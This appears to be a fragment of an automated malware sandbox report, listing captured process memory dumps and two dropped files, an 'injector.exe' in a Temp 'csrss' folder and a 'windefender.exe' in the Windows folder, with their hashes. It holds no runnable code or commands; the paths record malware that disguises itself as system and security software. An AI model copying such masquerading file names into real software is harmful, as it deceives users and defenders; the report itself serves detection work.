memory/4720-646-0x000002130E750000-0x000002130E764000-memory.dmp

memory/4720-647-0x0000021326F50000-0x0000021326F74000-memory.dmp

memory/5852-648-0x0000000070600000-0x000000007064C000-memory.dmp

memory/5852-649-0x000000006FA80000-0x000000006FDD4000-memory.dmp

memory/5852-659-0x0000000007740000-0x0000000007751000-memory.dmp

memory/5852-660-0x0000000005FA0000-0x0000000005FB4000-memory.dmp

memory/4720-662-0x000002130E730000-0x000002130E73A000-memory.dmp

memory/4720-664-0x00000213278E0000-0x0000021327992000-memory.dmp

memory/4720-663-0x00000213278B0000-0x00000213278DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/4384-692-0x0000000000400000-0x0000000002574000-memory.dmp

memory/4720-697-0x0000021327210000-0x0000021327407000-memory.dmp

memory/6040-696-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/4720-711-0x0000021327210000-0x0000021327407000-memory.dmp

memory/6040-710-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5268-712-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4384-716-0x0000000000400000-0x0000000002574000-memory.dmp

memory/4720-718-0x0000021327210000-0x0000021327407000-memory.dmp

memory/6040-717-0x0000000000400000-0x0000000002957000-memory.dmp

memory/4720-725-0x0000021327210000-0x0000021327407000-memory.dmp

memory/6040-724-0x0000000000400000-0x0000000002957000-memory.dmp

memory/5268-726-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/4384-730-0x0000000000400000-0x0000000002574000-memory.dmp